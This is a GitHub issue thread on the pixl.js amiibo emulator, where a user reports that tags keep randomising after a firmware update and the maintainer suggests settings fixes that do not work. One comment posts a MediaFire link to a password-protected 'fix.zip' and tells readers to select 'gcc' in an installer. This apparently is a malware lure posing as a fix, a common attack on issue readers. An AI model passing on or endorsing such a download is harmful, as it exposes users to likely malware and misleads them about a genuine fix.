### ISSUE TITLE
Amiibo in 'browser' dont save

### ISSUE THREAD

**Issue by Breadmasterpro** [solosky/pixl.js#268]
Before I updated, every time I went into the browser the amiibo tag would always be the same unless I manually randomised it. Now, after the update, every time I go back into browser and select the same amiibo, it always has a different tag which makes it near impossible to use for games that you need to register the amiibo.

**Comment by PiaoR** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by solosky** [comment]
Please turn off the Randomize function in amiibo detail menu.

**Comment by Breadmasterpro** [comment]
> Please turn off the Randomize function in amiibo detail menu.

I did this but it still randomised them

**Comment by solosky** [comment]
Try to reset to default settings in Setting menu.

**Comment by Breadmasterpro** [comment]
> Try to reset to default settings in Setting menu.

This did not fix the issue

**Comment by Breadmasterpro** [comment]
> Try to reset to default settings in Setting menu.

I have updated to the latset firmware, made sure auto random is off, rebooted and reset settings but they still will not save :( do you know why this is happening?
